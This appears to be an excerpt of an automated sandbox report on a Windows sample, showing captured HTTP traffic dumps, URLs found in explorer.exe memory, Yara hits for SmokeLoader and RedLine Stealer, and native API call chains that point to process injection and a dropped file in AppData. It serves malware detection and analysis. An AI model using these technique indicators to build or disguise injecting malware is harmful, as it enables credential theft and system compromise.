20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 11 Oct 2024 04:38:08 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 11 Oct 2024 04:38:10 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 11 Oct 2024 04:38:11 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 11 Oct 2024 04:39:21 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 11 Oct 2024 04:39:28 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 11 Oct 2024 04:39:36 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 11 Oct 2024 04:39:44 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 11 Oct 2024 04:39:55 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 11 Oct 2024 04:40:08 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 11 Oct 2024 04:40:21 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 11 Oct 2024 04:40:34 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 11 Oct 2024 04:40:47 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Fri, 11 Oct 2024 04:40:59 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Source: explorer.exe, 00000001.00000000.1731082031.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1734283056.000000000982D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: explorer.exe, 00000001.00000000.1731082031.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1734283056.000000000982D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: explorer.exe, 00000001.00000000.1731082031.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1734283056.000000000982D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: explorer.exe, 00000001.00000000.1731082031.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1734283056.000000000982D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 00000001.00000000.1731082031.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: explorer.exe, 00000001.00000000.1733819519.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1733347044.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1735918498.0000000009B60000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: explorer.exe, 00000001.00000000.1740089968.000000000C99C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000001.00000000.1740089968.000000000C893000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
Source: explorer.exe, 00000001.00000000.1731082031.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/Vh5j3k
Source: explorer.exe, 00000001.00000000.1731082031.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/odirmr
Source: explorer.exe, 00000001.00000000.1740089968.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000001.00000000.1734283056.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000001.00000000.1734283056.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/q
Source: explorer.exe, 00000001.00000000.1729931330.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1729259772.0000000001240000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000001.00000000.1734283056.00000000096DF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
Source: explorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
Source: explorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1734283056.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 00000001.00000000.1734283056.00000000096DF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.comi
Source: explorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
Source: explorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
Source: explorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
Source: explorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
Source: explorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
Source: explorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
Source: explorer.exe, 00000001.00000000.1731082031.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
Source: explorer.exe, 00000001.00000000.1731082031.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
Source: explorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
Source: explorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
Source: explorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
Source: explorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
Source: explorer.exe, 00000001.00000000.1740089968.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.com
Source: explorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
Source: explorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
Source: explorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
Source: explorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
Source: explorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
Source: explorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
Source: explorer.exe, 00000001.00000000.1731082031.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
Source: explorer.exe, 00000001.00000000.1740089968.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.com_
Source: explorer.exe, 00000001.00000000.1740089968.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.comcember
Source: explorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
Source: explorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000001.00000000.1740089968.000000000C557000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/L
Source: explorer.exe, 00000001.00000000.1740089968.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.com
Source: explorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
Source: explorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
Source: explorer.exe, 00000001.00000000.1731082031.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
Source: explorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
Source: explorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
Source: explorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
Source: explorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
Source: explorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
Source: explorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
Source: explorer.exe, 00000001.00000000.1731082031.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
Source: explorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
Source: explorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
Source: explorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
Source: explorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com:443/en-us/feed
Source: explorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
Source: explorer.exe, 00000001.00000000.1731082031.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe

Source: unknown	Network traffic detected: HTTP traffic on port 50575 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50575

Source: unknown

HTTPS traffic detected: 23.145.40.164:443 -> 192.168.2.4:50575 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected SmokeLoader

Source: Yara match	File source: 00000006.00000002.2354485892.0000000002CF1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2705916813.0000000002BB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2011339150.0000000002CF1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2011243889.0000000002CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2706245670.0000000002CF1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1760185099.0000000002FF1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1759831578.0000000002C40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2354402356.0000000002CC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000006.00000002.2354485892.0000000002CF1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000000.00000002.1760101074.0000000002DF7000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000008.00000002.2705916813.0000000002BB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000005.00000002.2011339150.0000000002CF1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000000.00000002.1759796388.0000000002C30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000008.00000002.2706573032.0000000002D27000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000005.00000002.2011243889.0000000002CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000008.00000002.2705859376.0000000002BA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000008.00000002.2706245670.0000000002CF1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000000.00000002.1760185099.0000000002FF1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000006.00000002.2354367271.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000006.00000002.2354648687.0000000002DA7000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.1759831578.0000000002C40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000005.00000002.2011394897.0000000002D27000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000005.00000002.2011202402.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000006.00000002.2354402356.0000000002CC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown

Source: C:\Windows\explorer.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\wBgwzVbZuV.exe	Code function: 0_2_00401514 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401514
Source: C:\Users\user\Desktop\wBgwzVbZuV.exe	Code function: 0_2_00402F97 RtlCreateUserThread,NtTerminateProcess,	0_2_00402F97
Source: C:\Users\user\Desktop\wBgwzVbZuV.exe	Code function: 0_2_00401542 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401542
Source: C:\Users\user\Desktop\wBgwzVbZuV.exe	Code function: 0_2_00403247 NtTerminateProcess,GetModuleHandleA,	0_2_00403247
Source: C:\Users\user\Desktop\wBgwzVbZuV.exe	Code function: 0_2_00401549 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401549
Source: C:\Users\user\Desktop\wBgwzVbZuV.exe	Code function: 0_2_0040324F NtTerminateProcess,GetModuleHandleA,	0_2_0040324F
Source: C:\Users\user\Desktop\wBgwzVbZuV.exe	Code function: 0_2_00403256 NtTerminateProcess,GetModuleHandleA,	0_2_00403256
Source: C:\Users\user\Desktop\wBgwzVbZuV.exe	Code function: 0_2_00401557 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401557
Source: C:\Users\user\Desktop\wBgwzVbZuV.exe	Code function: 0_2_0040326C NtTerminateProcess,GetModuleHandleA,	0_2_0040326C
Source: C:\Users\user\Desktop\wBgwzVbZuV.exe	Code function: 0_2_00403277 NtTerminateProcess,GetModuleHandleA,	0_2_00403277
Source: C:\Users\user\Desktop\wBgwzVbZuV.exe	Code function: 0_2_004014FE NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_004014FE
Source: C:\Users\user\Desktop\wBgwzVbZuV.exe	Code function: 0_2_00403290 NtTerminateProcess,GetModuleHandleA,	0_2_00403290
Source: C:\Users\user\AppData\Roaming\wehrbbi	Code function: 5_2_00401514 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	5_2_00401514
Source: C:\Users\user\AppData\Roaming\wehrbbi	Code function: 5_2_00402F97 RtlCreateUserThread,NtTerminateProcess,	5_2_00402F97
Source: C:\Users\user\AppData\Roaming\wehrbbi	Code function: 5_2_00401542 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	5_2_00401542
Source: C:\Users\user\AppData\Roaming\wehrbbi	Code function: 5_2_00403247 NtTerminateProcess,GetModuleHandleA,	5_2_00403247
Source: C:\Users\user\AppData\Roaming\wehrbbi	Code function: 5_2_00401549 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	5_2_00401549
